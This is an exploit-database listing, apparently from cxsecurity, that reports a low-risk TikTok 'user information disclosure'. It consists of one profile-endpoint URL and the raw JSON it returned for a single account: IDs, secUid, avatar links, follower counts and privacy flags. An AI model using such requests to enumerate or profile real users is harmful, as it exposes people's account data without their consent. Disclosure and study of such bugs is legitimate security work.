Vulnerability disclosure of Tik Tok user information

2020.11.30
sa Majed (SA) sa
Risk: Low
Local: No
Remote: Yes
CVE:
CWE: N/A

##################################################### # Exploit : disclosure of Tik Tok user information # 30/11/2020 # Category : Web Application Bugs # Tested on: windows 10 ##################################################### # Demo: # https://www.tiktok.com/node/share/user/@ae {"statusCode":0,"statusMsg":"","userInfo":{"user":{"id":"10786675","shortId":"0","uniqueId":"ae","nickname":"ae","avatarLarger":"https://sf-tk-sg.ibytedtos.com/obj/tiktok-obj/1613746256880653","avatarMedium":"https://sf-tk-sg.ibytedtos.com/obj/tiktok-obj/1613746256880653","avatarThumb":"https://sf-tk-sg.ibytedtos.com/obj/tiktok-obj/1613746256880653","signature":"","createTime":1443336057,"verified":false,"secUid":"MS4wLjABAAAAOx6p2WtV-nLHVQD7FOTdYBAvaqjQhij27VLaqRKou9Q","ftc":false,"relation":0,"openFavorite":false,"commentSetting":0,"duetSetting":0,"stitchSetting":0,"privateAccount":false,"secret":false},"stats":{"followerCount":443,"followingCount":0,"heart":0,"heartCount":0,"videoCount":0,"diggCount":0},"shareMeta":{"title":"ae on TikTok","desc":"@ae 443 Followers, 0 Following, 0 Likes - Watch awesome short videos created by ae"}},"predictedLanguage":null,"metaParams":{"title":"ae (@ae) TikTok | Watch ae's Newest TikTok Videos","keywords":"ae,ae,TikTok, ティックトック, tik tok, tick tock, tic tok, tic toc, tictok, тик ток, ticktock","description":"ae (@ae) on TikTok | 0 Likes. 443 Fans. Watch the latest video from ae (@ae).","canonicalHref":"https://www.tiktok.com/@ae","robotsContent":"index, follow","applicableDevice":"pc, mobile"},"itemList":[],"descVideo":{}}

References:

https://twitter.com/Mm4Xm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top